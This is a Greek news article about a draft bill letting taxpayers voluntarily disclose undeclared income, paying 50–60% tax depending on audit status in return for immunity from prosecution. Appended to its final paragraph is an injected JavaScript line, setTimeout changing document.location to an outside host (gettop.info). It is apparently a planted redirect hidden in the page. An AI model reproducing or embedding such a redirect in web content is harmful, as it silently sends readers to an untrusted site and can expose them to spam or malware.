Τι προβλέπει το ν/σ για την οικειοθελή αποκάλυψη των αδήλωτων εισοδημάτων

0
5

 

Έως το τέλος του μήνα αναμένεται η κατάθεση του νομοσχεδιου για την οικειοθελή αποκάλυψη των αδήλωτων εισοδημάτων. Όπως προβλέπει το συγκεκριμένο νομοσχέδιο, για τις υποθέσεις που δεν έχει ξεκινήσει φορολογικός έλεγχος θα καταβάλλεται φόρος 50%, ενώ για τις υποθέσεις που ο έλεγχος βρίσκεται σε εξέλιξη 55% και 60% για τους φορολογουμένους με υποθέσεις για τις οποίες ο έλεγχος έχει ολοκληρωθεί.

Σύμφωνα με αρμόδιες πηγές, μεταξύ των συναρμόδιων υπουργείων Οικονομικών και Δικαιοσύνης και των θεσμών σε επίπεδο τεχνικών κλιμακίων, όπως μεταδίδει το Αθηναϊκό Πρακτορείο, έχει επιτευχθεί συμφωνία η οποία προβλέπει την καταβολή φόρου από 50% έως 60% για την οικειοθελή αποκάλυψη αδήλωτων εισοδημάτων του παρελθόντος.

Με την καταβολή του φόρου οι φορολογούμενοι θα κλείνουν τις υποθέσεις τους και θα απαλλάσσονται από ποινικές διώξεις για πράξεις φοροδιαφυγής.

Επίσης, στο ν/σ θα προβλέπεται περιθώριο δύο μηνών εντός του οποίου οι φορολογούμενοι θα κληθούν, εφόσον το επιθυμούν, να κάνουν χρήση των ευνοϊκών διατάξεων για την αποκάλυψη των αδήλωτων εισοδημάτων τους.

Μετά την προθεσμία αυτή αναμένεται να ξεκινήσει η συμπλήρωση του ηλεκτρονικού περιουσιολογίου για όλους τους φορολογουμένους.

Το νομοσχέδιο για τη οικειοθελή αποκάλυψη των αδήλωτων εισοδημάτων όπως και αυτό για την επέκταση των ηλεκτρονικών συναλλαγών αποτελούν προτεραιότητες του κυβερνητικού έργου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here